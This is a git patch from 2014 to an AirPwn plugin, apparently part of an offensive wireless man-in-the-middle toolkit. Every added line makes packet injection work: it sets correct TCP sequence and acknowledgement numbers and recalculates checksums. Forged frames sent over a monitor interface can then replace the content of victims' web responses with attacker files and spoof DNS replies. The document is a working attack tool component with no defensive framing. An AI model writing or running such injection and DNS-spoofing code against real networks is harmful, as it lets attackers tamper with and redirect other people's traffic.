From 76fd67d2452d085ae9aa90cfe4d69da501145d07 Mon Sep 17 00:00:00 2001
From: byt3bl33d3r <byt3bl33d3r@gmail.com>
Date: Fri, 31 Oct 2014 22:19:58 +0100
Subject: [PATCH] airpwn plugin now calculates correct seq, ack and checksums

---
 plugins/AirPwn.py | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)

diff --git a/plugins/AirPwn.py b/plugins/AirPwn.py
index d314edb..6fbd549 100644
--- a/plugins/AirPwn.py
+++ b/plugins/AirPwn.py
@@ -74,11 +74,21 @@ class AirPwn(Plugin):
 						response.src, response.dst = packet.dst, packet.src
 						# Switch the ports
 						response.sport, response.dport = packet.dport, packet.sport
+						# Switch sequence and ack
+						response[TCP].seq = packet[TCP].ack
 						# Inject our data
 						response[Raw].load = open(rule[1]['response'], 'rb').read()
+						# Calculate new ack
+						response[TCP].ack = packet[TCP].seq + len(response[Raw].load)
+						#delete packet checksums
+						del response[IP].chksum
+						del response[TCP].chksum
+						#Some scapy-fu to re-calculate all checksums
+						response = response.__class__(str(response))
 						# Send the packet
 						sendp(response, iface=self.mon_interface, verbose=False)
 						logging.info("%s >> Replaced content" % response.src)
+
 				elif 'ignore' not in rule[1].keys():
 					if (re.search(rule[1]['match'], packet[Raw].load)):
 						response = packet.copy()
@@ -86,7 +96,12 @@ class AirPwn(Plugin):
 						response.addr1, response.addr2 = packet.addr2, packet.addr1
 						response.src, response.dst = packet.dst, packet.src
 						response.sport, response.dport = packet.dport, packet.sport
+						response[TCP].seq = packet[TCP].ack
 						response[Raw].load = open(rule[1]['response'], 'rb').read()
+						response[TCP].ack = packet[TCP].seq + len(response[Raw].load)
+						del response[IP].chksum
+						del response[TCP].chksum
+						response = response.__class__(str(response))
 						sendp(response, iface=self.mon_interface, verbose=False)
 						logging.info("%s >> Replaced content" % response.src)
 
@@ -110,6 +125,11 @@ class AirPwn(Plugin):
 				rdata = self.dnspwn
 			)
 
+			del response[IP].chksum
+			del response[UDP].chksum
+			del response[UDP].len
+			response = response.__class__(str(response))
+
 			sendp(response, iface=self.mon_interface, verbose=False)
 			logging.info("%s >> Spoofed DNS for %s" % (response.src, req_domain))